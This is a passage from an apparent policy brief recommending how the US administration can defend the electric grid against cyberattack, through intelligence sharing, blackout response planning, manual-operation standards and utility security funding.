To protect the grid from cyberattack, the Trump administration should initially focus on creating an information-sharing system that can bring together early signals that an attack against the grid is under way and share information that can be used to stop it. A stronger E-ISAC and a strong DOE counterpart to support it are necessary. The DOE should model its efforts on the Department of Defense’s Cyber Crime Center, which provides intelligence feeds and forensic support to companies within the defense industrial base. The newly created Cyber Threat Intelligence Integration Center within the Office of the Director of National Intelligence should ensure that collection and analysis of threats to the grid are an intelligence priority and that intelligence on threats to the grid are downgraded and shared with targeted utilities.

Digital and Cyberspace Update Digital and Cyberspace Policy program updates on cybersecurity, digital trade, internet governance, and online privacy. Bimonthly. Thank you for signing up. You can also sign up to receive our other newsletters: View All Newsletters

In the event that an attack on the grid succeeds in causing blackout to some extent, the Trump administration should ensure that both the government and the industry are prepared to respond. FEMA should develop a response plan for a prolonged regional blackout that addresses the logistical difficulties of responding at scale in an environment degraded by the loss of power. NERC standards should require companies to maintain capabilities for manual operations. Those operations need to be exercised on a regional and coordinated basis.

Finally, the Trump administration should ensure that utilities can invest sufficiently in cybersecurity and do not need to make tradeoffs between traditional risk management activities and addressing national security threats. Increased funding could be achieved through a user fee similar to the universal service fee on phone lines, though a new tax on consumers may not be politically feasible. Alternatively, a tax deduction for utility spending on cybersecurity may be a less direct—but more politically palatable—way to increase funding. The Trump administration should also set security requirements for infrastructure investments made for the grid as part of its proposed stimulus package.

Collectively, these recommendations, if implemented, would greatly reduce the likelihood of an adversary deciding to conduct a cyberattack on the U.S. power grid while also improving the chances that the United States would manage any such attack without significant disruption of service.